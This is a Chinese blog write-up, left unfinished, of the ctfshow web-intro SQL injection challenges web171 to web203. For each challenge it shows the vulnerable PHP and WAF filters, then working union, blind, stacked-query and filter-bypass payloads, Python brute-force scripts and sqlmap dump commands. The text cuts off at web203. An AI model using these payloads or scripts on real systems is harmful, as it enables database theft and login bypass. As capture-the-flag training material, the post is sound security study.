ctfshow web入门 sql注入wp(未完)

已于 2022-03-08 20:04:35 修改
阅读量6.1k 收藏 4
点赞数 3
文章标签: web安全 安全
于 2022-03-08 19:25:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49436541/article/details/123360729
版权

目录

部分参考:
https://blog.csdn.net/solitudi/article/details/110144623
https://www.wlhhlc.top/posts/14827/
群内pdf

web171

题目源码

//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

解题思路

最基础的无过滤字符型注入,先order判断表长,然后union select进行联合查询

Payload

1'order by 3--+
-1'union select 1,2,3
-1'union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()--+
-1'union select group_concat(column_name),2,3 from information_schema.columns where table_name='ctfshow_user'--+
-1'union select password,2,3 from ctfshow_user--+

web172

题目源码

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }

解题思路

和上题一样,只不过这次回显只有两条,而且返回结果里如果有‘flag’就不返回结果,但是ctfshow的flag格式为ctfshow{},并没有‘flag’,迷惑行为,所以直接把上题的payload去掉一条直接打就行

Payload

1'order by 2--+
-1'union select 1,2
-1'union select group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
-1'union select group_concat(column_name),3 from information_schema.columns where table_name='ctfshow_user2'--+
-1'union select password,2,3 from ctfshow_user2--+

web173

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

解题思路

和前两题一样,payload直接打

Payload

1'order by 3--+
-1'union select password,3 from ctfshow_user3--+

web174

题目源码

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

解题思路

这题依旧是无过滤的注入,但是要求返回结果不能有数字,但可以把数字用replace()来把数字改成其他的东西,或者直接把返回结果打印到一个文件中,这次采用了替换的方法

Payload

-1' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(password),'1','numa'),'2','numb'),'3','numc'),'4','numd'),'5','nume'),'6','numf'),'7','numg'),'8','numh'),'9','numi'),'0','numj'),'a' from ctfshow_user4 where username='flag'--+

EXP

a='ctfshow{bnumanumbnumbnumbdac-anumacc-numdnumdnumdnumf-bbnumdnumb-numgbanumdnumgnumgnumaefcnumfc}'
a=a.replace('numa','1')
a=a.replace('numb','2')
a=a.replace('numc','3')
a=a.replace('numd','4')
a=a.replace('nume','5')
a=a.replace('numf','6')
a=a.replace('numg','7')
a=a.replace('numh','8')
a=a.replace('numi','9')
a=a.replace('numj','0')
print(a)

web175

题目源码

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

解题思路

网页的返回结果不能有任何字符,可以通过上题的另一种方法,把数据写入到一个文件中

内容 into outfile ‘文件名’

Payload

-1' union select username,password from ctfshow_user5 where username ='flag' into outfile '/var/www/html/1.txt'--+

web176

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

开始过滤了,union select 大小写绕过即可

Payload

-1'uniOn seLect password,2,3 from ctfshow_user where username='flag'--+

web177

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

这把过滤了空格,用/**/注释符替换掉就行

Payload

-1'union/**/select/**/password,2,3/**/from/**/ctfshow_user/**/where/**/username='flag'%23
#井号一定要改成%23

web178

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

过滤了空格,同时/**/也不给用了,先试试%09

Payload

-1'union%09select%09password,2,3%09from%09ctfshow_user%09where%09username='flag'%23

web179

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

依旧过滤了空格,%09也不行了,试试%0c

Payload

-1'union%0cselect%0cpassword,2,3%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%23

web180

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

%0c还是可以,但井号被过滤了,可以把%23换成–%0c,因为最开始用的注释符–+那个加号就是空格的意思,所以可以代替

Payload

-1'union%0cselect%0cpassword,2,3%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'--%0c

web181

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
  }

解题思路

%0c也不给了,可以换成其他方法,使用username !=‘flag’ and id =1 or username=‘flag’,or两边会分别运算,左边的!=’flag‘不会影响到右边的=‘flag’,如果前面无效的话,就只会执行后面的,但是后面还有个单引号要闭合,但已经无法使用注释符了,只能使用单引号来闭合它,所以

Payload

-1'or(username='flag')and'a'='a

web182

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
  }

解题思路

和上题一样,但过滤了’flag’,所以无法使用username=‘flag’,但经过了这么多题,我们已经知道了flag的id为26,所以

Payload

-1'or(id=26)and'a'='a

web183

题目源码

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }

解题思路

不一样起来了,已经不回显查询到的数据了,但是会返回查询到的个数,所以可以利用脚本爆破出最终flag

EXP

import requests
url='http://56b6b2c0-66ee-458a-9693-bf7fe2a97be2.challenge.ctf.show/select-waf.php'
flagstr="}{-1234567890zxcasdqwertyfghvbnuiojklmZXCVBNMASDFGHJKLQWERTYUIOP"
flag='ctfshow'
while 1:
    for i in flagstr:
        payload={"tableName":"(ctfshow_user)where(pass)regexp('"+flag+i+"')"}
        r=requests.post(url,payload)
        if "$user_count = 1;" in r.text:
            flag=flag+i
            print(flag)
            break
    if '}'in flag:
        break

web184

题目源码

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }

解题思路

还是盲注,where没了,没法where like了,但是没有过滤空格,可以换成连接查询

EXP

import requests
url='http://56b6b2c0-66ee-458a-9693-bf7fe2a97be2.challenge.ctf.show/select-waf.php'
flagstr="}{-1234567890zxcasdqwertyfghvbnuiojklmZXCVBNMASDFGHJKLQWERTYUIOP"
flag='ctfshow'
for i in range(9,200):
    for j in flag_str:
        str_16=hex(ord(j))
        payload={"tableName":f"ctfshow_user as a right join ctfshow_user as b on substr(b.pass,{i},100) like {str_16}25"}
        r=requests.post(url,payload)
        if "$user_count = 43;" in r.text:
            flag=flag+j
            print(flag)
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select * from text as a left join text as b on substr(b.flag,5,100) like(0x7b25);
+------+---------------------+------+---------------------+
| id   | flag                | id   | flag                |
+------+---------------------+------+---------------------+
|    1 | flag{this_is_mysql} |    1 | flag{this_is_mysql} |
+------+---------------------+------+---------------------+
1 row in set (0.000 sec)

web185

题目源码

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }

解题思路

不给数字了,但是在sql中,ture=1,ture+ture=2,所以可以用ture代替数字

EXP

import requests
import time
url='http://6010100f-7d0f-45a2-84dd-4c356e0551cd.challenge.ctf.show/select-waf.php'
flag='ctfshow{'
flag_str='-1234567890}{zxcvbnmasdfghjklqwertyuiopZXCVBNMASDFGHJKLQWERTYUIOP'
for i in range(9,200):
    for j in flag_str:
        str_10=ord(j)
        payload={"tableName":f"ctfshow_user as a right join ctfshow_user as b on substr(b.pass,true"+"+true"*(i-1)+","+"true) like char(true"+"+true"*(str_10-1)+")"}
        r=requests.post(url,payload)
        if "$user_count = 43;" in r.text:
            flag=flag+j
            print(flag)
            break
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select * from text as a left join text as b on substr(b.flag,1,1) like(char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true));
+------+---------------------+------+---------------------+
| id   | flag                | id   | flag                |
+------+---------------------+------+---------------------+
|    1 | flag{this_is_mysql} |    1 | flag{this_is_mysql} |
+------+---------------------+------+---------------------+
1 row in set (0.000 sec)

web186

题目源码

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\%|\<|\>|\^|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }

解题思路

和上题一样

EXP

import requests
import time
url='http://6010100f-7d0f-45a2-84dd-4c356e0551cd.challenge.ctf.show/select-waf.php'
flag='ctfshow{'
flag_str='-1234567890}{zxcvbnmasdfghjklqwertyuiopZXCVBNMASDFGHJKLQWERTYUIOP'
for i in range(9,200):
    for j in flag_str:
        str_10=ord(j)
        payload={"tableName":f"ctfshow_user as a right join ctfshow_user as b on substr(b.pass,true"+"+true"*(i-1)+","+"true) like char(true"+"+true"*(str_10-1)+")"}
        r=requests.post(url,payload)
        if "$user_count = 43;" in r.text:
            flag=flag+j
            print(flag)
            break
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select * from text as a left join text as b on substr(b.flag,1,1) like(char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true));
+------+---------------------+------+---------------------+
| id   | flag                | id   | flag                |
+------+---------------------+------+---------------------+
|    1 | flag{this_is_mysql} |    1 | flag{this_is_mysql} |
+------+---------------------+------+---------------------+
1 row in set (0.000 sec)

web187

题目源码

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";
    $username = $_POST['username'];
    $password = md5($_POST['password'],true);

    //只有admin可以获得flag
    if($username!='admin'){
        $ret['msg']='用户名不存在';
        die(json_encode($ret));
    }

解题思路

开始登录了,用户名如果不是admin的话就无法获得flag,而且密码在传输过去后会被md5加密一次,所以无法直接or 1=1,但是有一个特殊的字符串ffifdyop,这个字符串在md5加密后会变成’or’6和一些不可打印字符,在sql中,字符型的比较数字开头会变成true,也就会变成’'or ture

Payload

用户名:admin
密码:ffifdyop

web188

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username}";
  //用户名检测
  if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==intval($password)){
      $ret['msg']='登陆成功';
      array_push($ret['data'], array('flag'=>$flag));
    }

解题思路

继续登录,但是密码不让用字母了,所以没法用上一个方法了,在sql中,字符=0成立,这是sql的弱比较,所以user=(1=0)or pass=0 成立,但过滤了or,可以换成||,或者直接用user=0 pass=0

Payload

用户名:1||1
密码:0

SQL示例

MariaDB [study]> select * from text where id=0||flag=0;
+------+---------------------+
| id   | flag                |
+------+---------------------+
|    1 | flag{this_is_mysql} |
+------+---------------------+
1 row in set, 1 warning (0.000 sec)

web189

不知为何无法成功,下一位

web190

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪

解题思路

没有任何过滤的布尔盲注,发现用户名错误和正确的回显不同,但脚本好像看不到这些字,看一眼答案,是api目录下的返回不同,也可以在源码里看到,数据是传到api里的,答案用的二分法,我懒得写就用普通的了

EXP

import requests
url='http://be5a60a3-e0fc-4f65-b510-8c2fe052028d.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(0,128):
        #payload=f"-1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j}#"
        #payload=f"-1' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))={j}#"
        payload=f"-1' or ascii(substr((select f1ag from ctfshow_fl0g),{i},1))={j}#"
        data={"username":payload,
        "password":'1'}
        r=requests.post(url,data)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1;
+--------------------------------------------------------------------------------------------------------------+
| ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1 |
+--------------------------------------------------------------------------------------------------------------+
|                                                                                                            0 |
+--------------------------------------------------------------------------------------------------------------+
1 row in set (0.038 sec)

MariaDB [study]> select ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=116;
+----------------------------------------------------------------------------------------------------------------+
| ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=116 |
+----------------------------------------------------------------------------------------------------------------+
|                                                                                                              1 |
+----------------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)

web191

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪
    if(preg_match('/file|into|ascii/i', $username)){
        $ret['msg']='用户名非法';
        die(json_encode($ret));
    }

解题思路

过滤了ascii可以用ord,一个意思

EXP

import requests
url='http://423be6bc-dbc4-4b51-805e-25b8a7e24d04.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(0,128):
        #payload=f"-1' or ord(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j}#"
        #payload=f"-1' or ord(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))={j}#"
        payload=f"-1' or ord(substr((select f1ag from ctfshow_fl0g),{i},1))={j}#"
        data={"username":payload,
        "password":'1'}
        r=requests.post(url,data)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

SQL示例

MariaDB [(none)]> select ord('a');
+----------+
| ord('a') |
+----------+
|       97 |
+----------+
1 row in set (0.000 sec)

MariaDB [(none)]> select ascii('a');
+------------+
| ascii('a') |
+------------+
|         97 |
+------------+
1 row in set (0.000 sec)

web192

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪
    if(preg_match('/file|into|ascii|ord|hex/i', $username)){
        $ret['msg']='用户名非法';
        die(json_encode($ret));
    }

解题思路

又过滤了ord,那就都不用了,直接和字符比较吧,还快一点

EXP

import requests
url='http://43a67595-f009-4c09-bd95-cfc5570b6f6a.challenge.ctf.show/api/'
flag=''
flagstr='qweasdzxcvbnmfghjklrtyuiopQAZWSXEDCRFVBTGNYHMUJKILOP0123456789}{-_'
for i in range(1,66):
    for j in flagstr:
        #payload=f"-1' or substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1)='{j}'#"
        #payload=f"-1' or substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{i},1)='{j}'#"
        payload=f"-1' or substr((select f1ag from ctfshow_fl0g),{i},1)='{j}'#"
        data={"username":payload,
        "password":'1'}
        r=requests.post(url,data)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag=flag+j
            print(flag)
            break
        elif j=='_':
            exit()
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t';
+------------------------------------------------------------------------------------------------------------+
| substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t' |
+------------------------------------------------------------------------------------------------------------+
|                                                                                                          1 |
+------------------------------------------------------------------------------------------------------------+
1 row in set (0.001 sec)

web 193

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪
    if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){
        $ret['msg']='用户名非法';
        die(json_encode($ret));
    }

解题思路

如题,换成mid,一个意思

EXP

import requests
url='http://8f100430-7936-4acb-a785-5dc713232fa9.challenge.ctf.show/api/'
flag=''
flagstr='qweasdzxcvbnmfghjklrtyuiopQAZWSXEDCRFVBTGNYHMUJKILOP0123456789},{-_'
for i in range(1,66):
    for j in flagstr:
        #payload=f"-1' or mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1)='{j}'#"
        #payload=f"-1' or mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{i},1)='{j}'#"
        payload=f"-1' or mid((select f1ag from ctfshow_flxg),{i},1)='{j}'#"
        data={"username":payload,
        "password":'1'}
        r=requests.post(url,data)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag=flag+j
            print(flag)
            break
        elif j=='_':
            exit()
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t';
+---------------------------------------------------------------------------------------------------------+
| mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t' |
+---------------------------------------------------------------------------------------------------------+
|                                                                                                       1 |
+---------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)

web194

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪
   if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){
        $ret['msg']='用户名非法';
        die(json_encode($ret));
    }

解题思路

没过滤mid,继续吧

EXP

import requests
url='http://8f100430-7936-4acb-a785-5dc713232fa9.challenge.ctf.show/api/'
flag=''
flagstr='qweasdzxcvbnmfghjklrtyuiopQAZWSXEDCRFVBTGNYHMUJKILOP0123456789},{-_'
for i in range(1,66):
    for j in flagstr:
        #payload=f"-1' or mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1)='{j}'#"
        #payload=f"-1' or mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{i},1)='{j}'#"
        payload=f"-1' or mid((select f1ag from ctfshow_flxg),{i},1)='{j}'#"
        data={"username":payload,
        "password":'1'}
        r=requests.post(url,data)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag=flag+j
            print(flag)
            break
        elif j=='_':
            exit()
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t';
+---------------------------------------------------------------------------------------------------------+
| mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t' |
+---------------------------------------------------------------------------------------------------------+
|                                                                                                       1 |
+---------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)

web195

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }
  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

堆叠注入,可以用update把所有pass改成0

EXP

用户名:0x61646d696e;update`ctfshow_user`set`pass`=0
密码:0

SQL示例

MariaDB [study]> select * from text;
+------+---------------------+
| id   | flag                |
+------+---------------------+
|    1 | flag{this_is_mysql} |
+------+---------------------+
1 row in set (0.000 sec)

MariaDB [study]> update`text`set`flag`=1;
Query OK, 1 row affected (0.019 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [study]> select * from text;
+------+------+
| id   | flag |
+------+------+
|    1 | 1    |
+------+------+
1 row in set (0.000 sec)

web196

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }
  if(strlen($username)>16){
    $ret['msg']='用户名不能超过16个字符';
    die(json_encode($ret));
  }
  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

题目说过滤了select,但并没有,为什么可以用select(0)绕过可以看一下sql示例

EXP

用户名:1;select(0);
密码:0

SQL示例

MariaDB [study]> select id,flag from text;
+------+---------------------+
| id   | flag                |
+------+---------------------+
|    1 | flag{this_is_mysql} |
+------+---------------------+
1 row in set (0.000 sec)

MariaDB [study]> select id,(0),flag from text;
+------+---+---------------------+
| id   | 0 | flag                |
+------+---+---------------------+
|    1 | 0 | flag{this_is_mysql} |
+------+---+---------------------+
1 row in set (0.000 sec)

web197

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set//i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

过滤了一大堆东西,但是没有过滤show,而且密码没有数字限制,所以可以用show table来绕过,原理和select 0类似

EXP

用户名:0x61646d696e;show tables
密码:ctfshow_user

SQL示例

MariaDB [study]> show tables;
+-----------------+
| Tables_in_study |
+-----------------+
| text            |
+-----------------+
1 row in set (0.000 sec)

web198

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

过滤增加了dorp和create,看来上题本来是想我们用drop把表删掉,然后重新创一个表来登录,和上题一样,没过滤show,继续吧

EXP

用户名:0x61646d696e;show tables
密码:ctfshow_user

SQL示例

MariaDB [study]> show tables;
+-----------------+
| Tables_in_study |
+-----------------+
| text            |
+-----------------+
1 row in set (0.000 sec)

web199

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop|\(/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

感觉好像没变化…继续吧,题目也说继续

EXP

用户名:0x61646d696e;show tables
密码:ctfshow_user

SQL示例

MariaDB [study]> show tables;
+-----------------+
| Tables_in_study |
+-----------------+
| text            |
+-----------------+
1 row in set (0.000 sec)

web200

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop|\(|\,/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }
  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

肛道理,最后几题堆叠没看出来太大区别

EXP

用户名:0x61646d696e;show tables
密码:ctfshow_user

SQL示例

MariaDB [study]> show tables;
+-----------------+
| Tables_in_study |
+-----------------+
| text            |
+-----------------+
1 row in set (0.000 sec)

web201

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

让你用sqlmap,然后根据要求改掉referer和user-agent

EXP

sqlmap -u http://cb57a502-0560-42a9-8a3a-12f0e210f188.challenge.ctf.show/api/?id=1 --dbs --referer="ctf.show"

sqlmap -u http://cb57a502-0560-42a9-8a3a-12f0e210f188.challenge.ctf.show/api/?id=1 -D ctfshow_web --tables --referer="ctf.show"

sqlmap -u http://cb57a502-0560-42a9-8a3a-12f0e210f188.challenge.ctf.show/api/?id=1 -D ctfshow_web -T ctfshow_user --columns --referer="ctf.show"

sqlmap -u http://cb57a502-0560-42a9-8a3a-12f0e210f188.challenge.ctf.show/api/?id=1 -D ctfshow_web -T ctfshow_user -C pass --dump --referer="ctf.show"

web202

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

让你用sqlmap,要求使用–data 调整sqlmap的请求方式

EXP

sqlmap -u http://f0cf8faf-89ce-4d6d-865d-b29bdaa03511.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" --dbs

sqlmap -u http://f0cf8faf-89ce-4d6d-865d-b29bdaa03511.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" -D ctfshow_web --tables

sqlmap -u http://f0cf8faf-89ce-4d6d-865d-b29bdaa03511.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" -D ctfshow_web -T ctfshow_user --columns

sqlmap -u http://f0cf8faf-89ce-4d6d-865d-b29bdaa03511.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" -D ctfshow_web -T ctfshow_user -C pass --dump

web203

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
